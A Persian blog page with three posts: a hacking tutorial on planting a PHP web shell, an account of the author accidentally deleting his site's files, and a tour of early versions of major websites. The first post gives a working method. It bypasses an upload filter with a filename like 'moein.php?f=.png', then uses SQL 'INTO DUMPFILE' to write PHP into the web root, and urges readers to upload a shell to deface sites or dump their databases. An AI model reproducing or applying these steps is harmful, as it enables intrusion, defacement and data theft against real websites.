چه جوری فایل شل رو با استفاده از دستورات sql آپلود کنیم؟

وقتی می خواهید یه فایل شل توی یه سایتی آپلود کنید،اول باید توی اون سایت یه باگی پیدا کنید،

مثلا فرض کنید یه سایتی به کاربراش فقط اجازه آپلود فایل های تصویری رو می ده، اونم می یاد با پیدا کردن آخرین .(نقطه) در اسم اون فایل و مقایسه عبارت بعد از dot با فرمت های قابل قبولش انجام می ده.

مثلا moein.moein.png خوب این یه فایل با فرمت png و اجازه آپلود شدن هم داره، چرا؟ چون عبارت بعد از آخرین نقطه رو به عنوان فرمت فایل در نظر می گیره که اونم png یه و فایل رو آپلود می کنه.البته این دفعه سیستم فرمت فایل رو درست تشخیص داد. ولی ما می خوایم گولش بزنیم … من یه فایل php درست می کنم و توش هرچی که دوست دارم رو می نویسم، به عنوان یه چیز ساده یه فایلی که فقط یه عبارت کوچولو رو چاپ کنه … Hacked By KNTU Hackers

<?php

echo (“Hacked By KNTU Hackers”);

?>

خوب حالا فایلم رو save می کنم ولی این دفعه اسمش رو می ذارم moein.php?f=.png

موقع آپلود اون سایت میاد دوباره آخرین دات رو پیدا می کنه، ادامش رو می خونه و به png می رسه و اجازه آپلود رو می ده.حالا من توی سایت اونا یه فایلی به اسم moein.php دارم که وقتی اجرا شه، توی صفحه Hacked By KNTU Hackers رو نشون می ده.البته این یه فایل ساده php بود ، به جای آپلود این فایل می تونید یه فایل شل آپلود کنیم و کلا اون سایت رو دیفیس کنید، از دیتابیسش بک آپ بگیرید یا …

ولی در اصل قرار بود با دستورات sql بگیم که چه جوری می شه یه فایل شل رو آپلود کرد و همه اینایی که گفتم یه جورایی مقدمه و در فشانی بود:دی

برای راحتی کار فرض کنید که به phpmyadmin یه سایتی دسترسی دارید، حالا می خواهید با استفاده از همین امکان ساده یه فایل php رو آپلود کنید.

خوب به عنوان یه کار ساده یه table توی یکی از دیتابیس ها درست می کنیم.

CREATE TABLE IF NOT EXISTS shell (
shell text NOT NULL
) ;

یه جدولی که فقط یه فیلد داره و اسم اونم shell گذاشتیم.

حالا یه سری اطلاعات مفیدتری توی این جدول می ریزیم، مثلا

INSERT INTO shell (

shell

) VALUES (

‘<?php echo (“Hacked By KNTU Hackers”); ?>’
الان ما یه سطری رو به جدول insert کردیم که توی اون یه کد php قرار داره.
حالا از این جدول یه خروجی می گیریم و توی یه فایل php ذخیره می کنیم ، مثلا
select * into dumpfile ‘/var/www/hacked.php’ from shell
حالا یه فایل به اسم hacked.php تولید شده،که توی اون یه عبارت php قرار داره.
وقتی اون فایل رو اجرا کنید، عبارت Hacked By KNTU Hackers نمایش داده می شه.حالا دوباره می تونید به جای این اطلاعات، می تونید با یه فایل شل این کارو انجام بدید و یه فایل شل رو با استفاده از دستورات sql آپلود کنید.

چه بر سر hivemined اومد که یه روز down بود؟

متاسفانه یه روز سایت خوابید :((

آآآآآآآآآآماااااااا چرا؟

راستش رو بخواین خودم گند زدم:دی

یعنی در اصل قرار نبود گند بخوره، ولی خورد

البته به دلیل مراتب امنیتی نمی تونم اطلاعات کافی بدم که چی شد:دی

ولی همین قدر بهتون بگم که فایل های pid پوشه run سرور رو پاک کردم … دریغ از اینکه سرور رو طوری کانفیگ کردند که واسه هر دامین یه یوزر جدید می سازه ( که البته مثل اینکه درستشم همینه ) ، و اون pid هایی که پاک کردم، pid های یوزر خودم بوده … واسه همین کل فایل های سایت پاک شد (متاسفانه)

از اول همه کارهارو انجام دادم،فایلی هایی که داشتم رو درست کردم ولی بعضی هاشون رو نشد. :(

مثلا بعضی از عکس ها رو نداشتم واسه همین نمی یان.

البته تنها شانسی که آوردم این بود که دیتابیس روی یوزر اصلی ران شده. خدارو هزااااااااار مرتبه شکر

بسی شانس آوردم

غول های اینترنتی در ابتدا چه شکلی بودند?

امروز داشتم ولگردی اینترنتی (وبگردی) می کردم که به یه سری عکس باحال رسیدم، عکس هایی از غول های اینترنتی امروز که همه اسمشون رو شنیدیم و یه سریشون هم شدند زندگیمون

 

 

 

گوگل، پر بازدیدترین سایت اینترنتی جهان

شرکتی که توی دانشگاه است استانفورد بنیانش گذاشته شد و الان هم بدون اون اینترنتی معنی نداره

درباره گوگل بخوانید

 

 

 

 

 

فیس بوک، پر بازدیدترین سایت اینترنتی،بعد از گوگل و بزرگترین و پر بازدیدترین جامعه مجازی دنیا با بیش از ۷۵۰ میلیون کاربر

سایتی که موقعی که دارین توش عضو می شین، بهتون می گه که بعد از اینکه اطلاعاتی،عکسی یا هر چیز دیگه رو توی این سایت گذاشتین ، شما دیگه هیچ مالکیتی روی اون ندارین.

خیلی ها می گن که اطلاعات رو می فروشه

سایتی که توسط مارک زوکربرگ، بدتیپ ترین ثروتمند جهان ، توی دانشگاه هاروارد راه اندازی شد.

درباره فیس بوک بخوانید

 

 

یاهو، سایتی که اکثرمون اینترنت رو با ایمیلش شروع کردیم، و همیشه هم یاورمون بوده در زمان های سخت چت:دی با یاهو مسنجر معروفش

هرچند این سایت رونق قبلیش رو نداره،ولی این سایت هم مثل گوگل توی دانشگاه استانفورد جرقش زده شد.

درباره یاهو بخوانید

 

 

 

 

 

یوتیوب،یکی از بزرگترین سایت های اینترنتی جهان و بزرگترین سایت اشتراک گذاری فیلم در دنیا.

این سایت رو ۳تا کارمند PayPal راه انداختن،بعد از اینکه توی جشن موفقیت فلیکر از خودشون فیلم گرفتند،ولی نمی دونستند که باید کجا آپلود کنند تا به همه نشون بدند،اون موقع بود که به فکر سایت یوتیوب افتادند.

یکی از سیاست های اصلی این سایت، مبارزه با هرزه نگاریه و فیلم های مستهجن رو به سرعت پاک می کنه.

درباره یوتیوب بخوانید

 

 

 

تویتر، بزرگترین میکروبلاگ جهان، این سایت با شعار چه اتفاقی در حال رخ دادن است؟ راه اندازی شد.

نرم افزار های متن باز و نسبتا رایگانی مثل شیرترانیکس برای راه اندازی سایت های مثل توییتر ایجاد شده که هرچند به خوبی اون نیست،ولی بازهم کار راه بندازه.

 

درباره توییتر بخوانید